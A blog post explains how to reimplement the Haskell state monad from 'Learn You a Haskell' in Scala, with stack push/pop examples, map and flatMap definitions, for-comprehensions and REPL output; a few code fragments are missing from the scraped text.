I specially thank Nilanjan Raychaudhuri - the author of Scala in action - for his precious help. Reading chapter 10 from his book confirmed I was working into the right direction.
Reproducing the LYAH example remains a fruitful exercise in that sense that it constrains you to use Scala idioms (typing, self type annotation etc.) and forces you to think about some of the inner mechanics of the for comprehensions.
In order to expose the interest of reproducing state management in functional programming languages, Miran Lipovaca presents a three coins problem simulating the extraction of results from tossing a coin, and a stack manipulation problem. From the point of view of imperative languages, the random generator internals or the stack internal would be easily modifiable, mutable objects allowing to generate new numbers or alter the stack state.
In pure functional language, we manipulate immutable data. We have to create a new value object each time the equivalent of a state change occurs. But what if we could separate the flow of data from the side effect manipulation of the change of state.
And that, is specifically our purpose, embedding a change of state in a dedicated instance. The secret lays into the abstract representation of this change of state as a function:
def apply(state: S): (T, S)
where S references the type of the state to be changed, and T is the type of the result of the stateful computations. The whole class hosts the apply function (so is applicable by itself in Scala), and impersonates the context that contains the state management. You apply the context in order to get your result value:
contextInstance(previousState) = (result, newState)
For the same price, you get the altered state. In the case of a stack, the state is the stack content. The provided manipulation contexts will be class instances implementing context templates for stack manipulation like pop and push. We will represent a stack state as a List of items of type A:
List[A]
Consequently, if we choose to name our state context StateMonad, the pop and push operations can be gathered in a Stack scope definition like the following:) } } }
taking a leap of faith regarding an existing definition of the StateMonad trait. In the mean time we have acknowledged that our state Monad trait definition will be parameterized as:
trait StateMonad[+T, S]
While pushing data on top of a stack, I expect no result, so I return a () (aka void) instance:
scala> import Stack._ import Stack._ scala> push(5)(List()) res0: (Unit, List[Int]) = ((),List(5))
while the result of a pop context execution may contain an optional item of type A, depending on the size of the previous stack state (no elements at all, or at least one element):
scala> import Stack._ import Stack._ scala> pop(List(1)) res1: (Option[Int], List[Int]) = (Some(1),List()) scala> pop(List()) res2: (Option[Nothing], List[Nothing]) = (None,List())
I believe the case pattern matching in the pop method body, to be self explanatory. Chaining the state modifications, then, can be achieved using both definitions of map and flatMap. The application of the map method is helpful in transforming the result embedded into the context, producing a new state Monad taking into account the expected transformation:
def map[U](f: T => U) = new StateMonad[U, S]
while defining a flatMap method helps in simplifying the chaining of
flatMap[U](f: T => StateMonad[U,S])
How is so ? Simply as we did last time
scala> import com.promindis.user._ import com.promindis.user._ scala> import Stack._ import Stack._ scala> val result = push(3).flatMap{ _ => | push(5).flatMap{_ => | push(7).flatMap{_ => | push(9).flatMap{_ => | pop.map{_ => ()} | } | } | } | } result: java.lang.Object with com.promindis.state.StateMonad[Unit,List[Int]] = com.promindis.state.StateMonad$$anon$1@124e407 scala> result(List()) res2: (Unit, List[Int]) = ((),List(7, 5, 3)) scala>
The benefit of map and flatMap becomes obvious while using more idiomatic Scala expressions like comprehensions that get interpreted as the above lines of codes:
scala> import com.promindis.user._ import com.promindis.user._ scala> import Stack._ import Stack._ scala> val result = for { | _ <- push(3) | _ <- push(5) | _ <- push(7) | _ <- push(9) | _ <- pop | } yield () result: java.lang.Object with com.promindis.state.StateMonad[Unit,List[Int]] = com.promindis.state.StateMonad$$anon$1@7a6088 scala> result(List(1)) res3: (Unit, List[Int]) = ((),List(7, 5, 3, 1)) scala>
The full implementation of the StateMonad trait becomes then:
package com.promindis.state trait StateMonad[+T, S] { owner => def apply(state: S): (T, S) def flatMap[U](f: T => StateMonad[U,S]) = new StateMonad[U, S] { override def apply(state: S) = { val (a, y) = owner(state) f(a)(y) } } def map[U](f: T => U) = new StateMonad[U, S] { def apply(state: S) = { val (a, y) = owner(state) (f(a), y) } } } object StateMonad { def apply[T, S](value: T) = new StateMonad[T, S] { def apply(state: S) = (value, state) } }
The map function produces a resulting new container instance in charge of applying the new state transformation on the transformed result from the original container instance. The typed self annotation owner, helps in referencing the original container from the apply method body of the new anonymous StateMonad instance:
owner =>
How do we extract the result from the previous container ? Again, applying the previous container itself:
val (a, y) = owner(state)
The result of the new anonymous StateMonad container will be
(f(a), y)
The body of the apply method in the container of the StateMonad instance resulting from the flatMap application will lead to
We have chained the previous container state change to the state change expected after the f function application. Whole this chaining is itself transparently hosted by a containing monad.
The complete stack example can be reproduced:
- the application of the previous container (so to extract the previous result and state),
- then the application of the transformation function to the result
- and finally the application of the new StateMonad instance f(a) to the y intermediate state.
package com.promindis.user import com.promindis.state._) } } } object UseState { import Stack._ def main(args: Array[String]) { val result = for { _ <- push(3) _ <- push(5) _ <- push(7) _ <- push(9) _ <- pop } yield () println(result(List(1))._2) val otherResult = push(3).flatMap{ _ => push(5).flatMap{_ => push(7).flatMap{_ => push(9).flatMap{_ => pop.map{_ => ()} } } } } println(otherResult(List(1))._2) } }
The example works fine as in LYAH, but I am not satisfied with the result for two reasons.
Until then, I have to do a little haskell, study more the disruptor and practice some katas.
Be seeing you !!! :)
|
http://patterngazer.blogspot.com/2012/01/changing-my-state-of-mind-with-monad-in.html
|
CC-MAIN-2018-13
|
refinedweb
| 1,224
| 51.38
|
Initializing a mutex
Destroying a mutex
Acquiring a mutex
Releasing a mutex
Trying to acquire a mutex
Use mutex_init(3C) to initialize the mutex pointed to by mp. For POSIX threads, see Initializing a Mutex.
#include <synch.h> #include <thread.h> int mutex_init(mutex_t *mp, int type, void *arg));
The type can be one of the following values.
USYNC_PROCESS. The mutex can be used to synchronize threads in this process and other processes. arg is ignored.
USYNC_PROCESS_ROBUST. The mutex can be used to robustly synchronize threads in this process and other processes. arg is ignored.
USYNC_THREAD. The mutex can be used to synchronize threads in this process only. arg is ignored.
When a process fails while holding a USYNC_PROCESS lock, subsequent requestors of that lock hang. This behavior is a problem for systems that failed process receives the lock. But, the lock is held with an error return indicating that the previous owner failed the mutex.
);
mutex_init() returns 0 if successful. When any of the following conditions is detected, mutex_init() fails and returns the corresponding value.
EFAULT
Description: mp points to an illegal address.
EINVAL
Description: The value specified by mp is invalid.
ENOMEM
Description: System has insufficient memory to initialize the mutex.
EAGAIN
Description: System has insufficient resources to initialize the mutex.
EBUSY
Description: System detected an attempt to reinitialize an active mutex.
Use
Description: mp points to an illegal address.
Use mutex_lock(3C) to lock the mutex pointed to by mp. When the mutex is already locked, the calling thread blocks until the mutex becomes available. Blocked threads wait on a prioritized queue. For POSIX threads, see pthread_mutex_lock Syntax.
#include <thread.h> int mutex_lock(mutex_t *mp);
mutex_lock() returns 0 if successful. When any of the following conditions is detected, mutex_lock() fails and returns the corresponding value.
EFAULT
Description: mp points to an illegal address.
EDEADLK
Description: The mutex is already locked and is owned by the calling thread.
Use
Description: mp points to an illegal address.
EPERM
Description: The calling thread does not own the mutex.
Use
Description: mp points to an illegal address.
EBUSY
Description: The system detected an attempt to reinitialize an active mutex.
|
http://docs.oracle.com/cd/E18752_01/html/816-5137/sthreads-72605.html
|
CC-MAIN-2015-27
|
refinedweb
| 358
| 60.72
|
Welcome to version 2.0 of the software and article! I have rewritten the key points of this article to address the new features in the latest version of the software. Read on for a full explanation...
New Features for 2.0
Note that any sequences created with the old version will continue to play just fine, but editing them could be troublesome due to the new timing method.
And now back to the article with updates. The hardware section remains the same, but the software discussion below is updated with new information.
I'm sure by now everyone with a computer has seen the videos of holiday light shows timed to holiday music such as this one. For this holiday season, I decided to create my own indoor show using some off-the-shelf components and .NET.
WARNING: The hardware portion of this project uses standard 120V AC current. As you are likely aware, this is enough voltage to seriously hurt or kill you. Please be careful and follow the instructions closely.
The hardware we are going to build will allow for one Phidget board to be plugged into a single AC outlet and provide 4 output outlets that can be switched off and on by the Phidget board's relays. By building two of these and placing them in a project box, I have a neat and tidy control box with 2 USB inputs, 2 AC male plugs for the wall, and 8 AC female plugs for my lights. The following description will be for building a single unit.
Let's start by preparing the extension cords. Cut the female end off of one extension cord. Split the cord up the center and strip the insulation off each of the wires to expose the ends. Twist the ends with your fingers to create a neat, twisted wire as shown:
Next, take the remaining four extension cords and cut the male ends off each. As before, split the cord up the center a small bit, strip off some insulation, and twist the exposed ends as shown:
Now, cut 4 equal lengths of your 14-16 gauge wire. These should be no longer than 2-4 inches in length. Strip some insulation off each end and twist up any loose wires.
For the next part, you will need to pay close attention. Each extension cord should have two different types of insulation around the wires. One side should have a ribbed edge, and one side should have a smooth edge shown below:
The ribbed side should be in line with the "fat" prong/receptacle (the neutral side) and the smooth side should be in line with the smaller prong/receptacle (the active/"hot" side). It is important that the next steps be followed carefully, noting which wires I am referring to. Using the wrong wire can lead to a short, blown fuses, kicked circuit breakers, or even worse things.
Take the 4 short wires you cut earlier and twist them all together along with the ribbed/neutral wire from the extension cord with the male end still attached.
Twist a wire nut over the exposed ends to keep them together and covered.
Next, twist together the smooth/"hot" wire from the four extension cords with the female ends still attached along with the smooth/"hot" wire from the extension cord with the male end attached (i.e. the other wire from the male cord used above).
Again, twist on a wire nut to keep things covered and safe.
You should now be left with the opposite ends of the 4 cut wires exposed, and the 4 ribbed/neutral wires of the female extension exposed. These will all be put into the screw terminals of the Phidget Interface Kit.
The Phidget Interface Kit board has 4 groups of screw terminals. Each group contains 3 items: NO, XC, and NC, where X is the relay number in question. These stand for "Normally Open", "Common", and "Normally Closed". For this project, the lights should normally be off and switched on via the software, so the NO (Normally Open) and XC (Common) ports will be used.
Place one wire from each exposed bundle into each NO and XC port. Note that it does not matter which wire you plug into which terminal of each group, just that each group has only one short wire and only one extension cord wire.
In the end, there will be one each of the 4 short wires in each group on the board, and one each of the extension cord wires in each group on the board as pictured:
Below is a very simple schematic of the wiring of a single board:
I decided to keep things neat and tidy and mount the Phidget boards into a project box. Since I have 2 boards to manage, I placed both inside a single, large box. I drilled holes in the short sides to expose the boards' USB ports. I then notched out some spaces on the top edge and lid for the extension cords to pass through. I mounted the boards inside the box with some carefully placed two-sided foam tape.
The finished product can be seen below:
And that's it! If this box will be placed outside, take the time to properly weatherproof the box so the elements cannot damage anything inside.
Your individual light strings will be plugged into each extension cord outlet. An average strand of mini-lights draws about .3 amps. An average string of larger bulbs will draw 1-2 amps. The relays on the Phidget board are rated at 10 amps. Additionally, a standard house circuit will allow up to 15-20 amps before overloading. Check the circuit breaker in your home on which the outlet you'll be using lives for the allowed amperage. Also, keep in mind that any other devices that are plugged into that circuit elsewhere in the house will be drawing power, so you may not be able to draw a full 15 amps from it. So, be sure to not draw more than 10A per channel, nor more than 15-20A in total, including all additional devices plugged into that circuit. Keep this in mind as you string your lights together on each channel.
Ensure the Phidgets libraries for .NET are installed on the development machine. To compile the source code, Visual Basic and/or Visual C# Express 2005 will also be need to be installed and working.
The Light Sequencer application uses a grid-style interface to show the list of channels and when each channel is switched on and off.
Squares can be toggled on or off by highlighting them, right-clicking with the mouse and selecting On or Off from the context menu. They can also be toggled by pressing the O (for on) or F (for off) keys on the keyboard.
Additionally, sequences can be "recorded" by pressing the Record button in the toolbar. This will start the music and allow the user to tap out the rhythm for each channel by pressing the number key on the keyboard corresponding to the channel.
Sequences can be saved at any time and reloaded for editing or play with the Phidgets devices connected.
When I first started the software for this project, the first problem I ran into was the fact that the DataGridView control does no support multiple headers. As is shown in the screenshot above, the grid is broken down into seconds and then milliseconds. For display purposes. it is easier to break the header down into two segments, one showing the labeled second markers, and one showing the subdivisions per second.
To accomplish this, I created two DataGridViews: one for the header, which contains no data and is only as tall as the header row, and one for the sub-header and the data below it. This works great except for scrolling. To accomplish this, I simply listen for the Scroll event on the main grid and apply the scrolling offset to the header grid:
Visual C#
private void dgvMain_Scroll(object sender, ScrollEventArgs e){ dgvHeader.HorizontalScrollingOffset = e.NewValue;}
Visual Basic
Private Sub dgvMain_Scroll(ByVal sender As Object, ByVal e As ScrollEventArgs) Handles dgvMain.Scroll dgvHeader.HorizontalScrollingOffset = e.NewValueEnd Sub
Additionally, I ran into some performance issues drawing the grid. At first, drawing a grid with so many columns was quite slow. By setting the grid's Visible property to false before adding the rows and columns and then returning the Visible property to true, the grid now draws quite quickly.
The next issue tackled was starting and stopping a music file. In version 2, the software supports sampled music (MP3, WAV, etc.) as well as MIDI files. As I was attempting to write a MIDI file parser and player (so I could have access to the internal data for auto-generating a sequence) I found a fantastic MIDI library written by Leslie Sanford. This library is used by the Light Sequencer application.
With two playback libraries in place, I created an interface which contains Start, Stop, Load, etc. methods so that the front-end could use any playback engine interchangeably. The MCIPlayback engine uses standard MCI commands for playing sampled music. Commands are executed by passing them to the mciSendString function exported by winmm.dll. In order to use this function from .NET, we must import the method and setup its signature as follows:
[DllImport("winmm.dll")]static extern Int32 mciSendString(String command, StringBuilder buffer, Int32 bufferSize, IntPtr hwndCallback);
Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal command As String, _ ByVal buffer As StringBuilder, ByVal bufferSize As Int32, _ ByVal hwndCallback As IntPtr) As Int32
To open a music file, the open command is used as follows:
open "<path to file>" type mpegvideo alias MediaFile
This opens the file and creates an alias named MediaFile which can be used to refer to the file for all future commands. Send the above command using the mciSendString method would look as follows:
string cmd = "open \"" + _musicFile + "\" type mpegvideo alias MediaFile";mciSendString(cmd, null, 0, IntPtr.Zero);
Dim cmd As String = "open """ + file + """ type mpegvideo alias MediaFile"mciSendString(cmd, Nothing, 0, IntPtr.Zero)
The remaining commands we will need are:
Next, the Phidget boards behavior needed to be implemented. Talking to the Phidget board is very easy. After creating an instance of the InterfaceKit object, a specific device can be opened by calling the open method, passing in the serial number of the device to be opened.
The serial numbers for each attached Phidget device can be determined by creating an instance of the Phidgets.Manager class, setting up the Attach event handler, and listening for the attach events as follows:
...Phidgets.Manager phidgetsManager = new Phidgets.Manager();phidgetsManager.Attach += new AttachEventHandler(phidgetsManager_Attach);phidgetsManager.open();...void phidgetsManager_Attach(object sender, AttachEventArgs e){ Debug.WriteLine(e.Device.Name + " - " + e.Device.SerialNumber)}
...Dim phidgetsManager as New Phidgets.ManagerAddHandler phidgetsManager.Attach, AddressOf Me.phidgetsManager_AttachphidgetsManager.open()...Private Sub phidgetsManager_Attach(ByVal sender As Object, ByVal e As AttachEventArgs) Debug.WriteLine(e.Device.Name & " - " & e.device.SerialNumber)End Sub
Setting the relay state is as easy as indexing into the outputs array of the InterfaceKit object and setting the indexed output to true or false.
In code, all of this would look like:
InterfaceKit ik = new InterfaceKit();ik.open(1234);ik.outputs[0] = true;
Dim ik as New InterfaceKitik.open(1234)ik.outputs(0) = True
In order to maintain precise timing, the Stopwatch class from the System.Diagnostics namespace is used. This internally uses the QueryPerformanceCounter Win32 API method to give extremely precise time values.
When it is time to playback a sequence, a thread is started which starts the music using the appropriate playback engine, and then sits in a loop, waiting for the number of milliseconds to pass specified in the sequence (50ms as default). When that amount of time has elapsed, we send the channel states of the current tick to the relays connected.
Recording a sequence with the keyboard works in a similar fashion. A thread is started and the music is played. While the music is playing, KeyDown and KeyUp events are listened for. After translating the KeyCode of the pressed key to the channel number, an internal array of which keys are "on and off" are maintained. When the number of milliseconds elapsed hits the appropriate mark, every channel is updated with the current value of that array. That is, which keys are up and down.
When the user stops playback, or the song ends, the channel data is returned to the main form and displayed in the main grid.
If a MIDI file is selected, sequence data is automatically generated based on the MIDI data. A MIDI file contains a series of tracks or channels with a series of commands. These commands tell the MIDI hardware what note to turn on, when, and for how long (among other things). When the MIDI file is loaded, every command from every channel is enumerated and its time values are converted into milliseconds. Once all the commands are gathered and organized, they are placed into this application's channel structure and displayed on the grid. This allows the lights to flash in precise time to the MIDI file being played.
Using the Software
Ensure that the Phidget devices you will be using are attached to the PC. Start by creating a new sequence from the File menu or by clicking the New Sequence button. In the dialog that appears, locate a music file to play back and enter the length of time that the sequence should run. Be sure to note which Phidget devices are attached and which channels they map to on the grid. Click OK when complete.
The screen will redraw and present the grid interface for the length of time specified. At this point, cells can be turned on and off by highlighting a cell and right-clicking, or by pressing the "O" key to turn the cell On, and the "F" key to turn the cell off. Multiple cells can be selected and changed at once.
To use the recording interface, click the Record Sequence button or choose Record Sequence from the Sequence menu. Be sure to select the correct choice of "Overwrite channel data" or "Append channel data." As you record additional channels, you will almost always want to append and not overwrite.
Click the start button and a brief countdown will begin. When the countdown reaches 0, the music will begin. A channel can be recorded by pressing the keyboard key of the channel number. For example, to tap out the rhythm of channel 1, press the 1 key at the appropriate times.
When complete, press the Escape key, or click the Stop button. When the Record window is closed, the main grid will be updated with the sequence recorded.
Creating a sequence is certainly a time consuming task since each channel needs to be recorded. While the rhythm interface allows one to record many channels simultaneously, I think it would be impossible for anyone to type out an entire sequence for all channels in one go. In my opinion, it is easiest to record one or two channels at a time and append the data as you go. In the end, you can use the grid interface to tweak the values and clean up any mistakes.
The sequence can be played back at any time. Simply press the Play button and watch your holiday lights play back to the timing you created. Press the Stop button to end the current playback.
Sequences can be saved at any time by selecting Save from the file menu.
To test the channels by hand, select "Test Channels" from the "Tools" menu. As with the recording screen, press the number keys associated with the channel to turn on or off to test that channel.
I found it was much easier to also have the lights plugged into the appropriate channels as I created my sequence. That way I could see the results of my recordings immediately.
To create a playlist of many sequences, select New Playlist from the File menu. Add your existing sequence files, order them as you wish, and save the playlist. From this screen you can also play the playlist, set it up to repeat, advance tracks, etc.
To edit data on an existing sequence (Phidget serial numbers, mapped MIDI channels, etc.) select Edit Sequence Properties from the Sequence menu. This will display the New Sequence dialog box and allow you to edit the existing setup.
So now that you have hardware, music and an animated sequence, it's time to hook it all up! If you are doing an indoor show, a set of external speakers should be more than ample for playing the music for your light show. For an outdoor show, you may wish to purchase an FM transmitter to output the music over a very low-powered FM frequency so that visitors can listen to the music on their car radios. I personally have not gone this route, however you can find a variety of FM transmitters for sale around the 'net. In a quick search, I found Ramsey Electronics which sells a variety of FM transmission hardware that is more than appropriate depending on your budget. I am certain there are plenty of other devices that fit the bill as well.
To fire up the show, just plug in your USB Phidget devices, plug the lights into the appropriate channels, load the Light Sequencer application, and press the Play button!
And there we have it! Holiday lights timed to your favorite holiday song. Take your time in creating a sequence and show us what you've created!
I plan on maintaining and updating this article as we get closer and closer to the holidays, so please check back often for updates. I will note updates at the top of the article. Additionally, please send me any and all feedback, bug reports, feature requests, or anything else you have to say! You can find my contact info in the readme.txt file located in the source code download linked above, or visit my website.
Special thanks to Michelle Leavitt for help setting up lights and sequence ideas, and my dad for advice on wiring up the relays.
Thanks to Leslie Sanford for the incredible MIDI Toolkit.
And, a big thank you to the beta testers for version 2: Allen Leno, Steve Runion, Steve Trueman, Corey Emmert. would like to receive an email when updates are made to this post, please register here
RSS
Build a ridable robot? Did you just create the neatest thing ever? Found something so cool that Coding4Fun
The Light Sequencer Program seems to give me an error when playing the example file. Do you know why?
I seen the video with the xmas lights. I thought it was bad ass.
great job!
Thank you very much for doing a terrific job of explaining everything step by step in such a clear and easy to understand way. I appreciate your work and sharing this with others. My nephew and I are going to make a sequencer for our Christmas display this year. It is an excellent opportunity to spend quality time with him doing something educational and FUN.
Can I use the PhidgetInterfaceKit 8/8/8 or 0/16/16 instead?
Sorry, you need an electrical relay to do this. I'm going to say that the 8/8/8 or the 0/16/16 couldn't support the electrical load. There are more advanced relays out there that can accommodate more inputs but you’ll have to add in support for that device.
Is there any option using phidgets to control the brightness of the lights?
I think it could be interesting to have a dimmer display with softer music, and send more power to the lights when the music calls for it.
I know I would have to code it myself, but so far I haven't been able to find if it is even possible.
I seem to have a problem with the code. After stepping through the code I can decipher it enough to tell that it does recognize that my phidget is attached. However, no device shows up on the new sequence form and I get a channels index out of range error at the first if statement of the Timer_Tick event in the record form. Your assistance with this matter would be appreciated.
Where Can i find the phidget Board In america because all the places that have them are outside of north america
After stepping through the code the software does recognize that my phidget is attached however the table on the new sequence form does not populate with my phidget info. Please advise.
@Chris, you can get them at Trossen Robotics, the link at the top of the page is actually linking to them.
it is very good. i think if it can combine with our LED cherry tree light, it will be perfect.
Latest phidget libraries (including the necessary .net libraries) can be found at:
Just need the Phidget21.msi
what web site to computeriz your lights
Do you khow if they have any programs to make light shows that are MAC compatable? I am a true PC user but my PC is way older than my MAC and cannot support the program. I am really enthusiastic about trying to build a light show but I havent found a program for MAC. Thanks!
PingBack from
PingBack from
PingBack from
Great!! .Net Merry Christmas!
Yeah!
PingBack from
Tressa: phidgets has libraries for Mac OSX, but you'd need to roll your own program.
Brain, in your notes about amperages, you have a minor error. the 10A rating at at 240V, so for a 120V application you actually have a 20A limit, but you are correct that you will need to watch that you don't overload the house circuit. Also some houses have outdoor and garage circuits rated for up to 25A, so if you are lucky you can run a hell of a lot on this.
And as far as the 0/16/16 board, you would need relays for 120VAC lights, but not if you found some 12VDC lights. However, a 0/16/16 board and a handful of relays is much cheaper than 4 0/0/4 boards if you don't mind the extra wiring and the extra DC power source to power the relays, plus you'd be able to tap into the digital inputs and do fun things like trigger the sequence from motion detection.
Is the source code still available?
Here is a list of my current Coding4Fun articles: WiiEarthVR Animated Musical Holiday Light Show - Version
@Jeff30161 The source is at the top of the paged under the "Download" link
Can i apply the same wiring method with LED lights?
I tried 2 LED strings (35 light each) & caused a power down.
then i bypassed the controller connected the 2 strings (by sharing the same extend cord) still black down.
i did sth wrong?
thanks
Here's an example of what you can do. It's pretty cool for the money...around $140 plus lights.
|
http://blogs.msdn.com/coding4fun/archive/2006/12/07/1230660.aspx
|
crawl-002
|
refinedweb
| 3,888
| 71.24
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.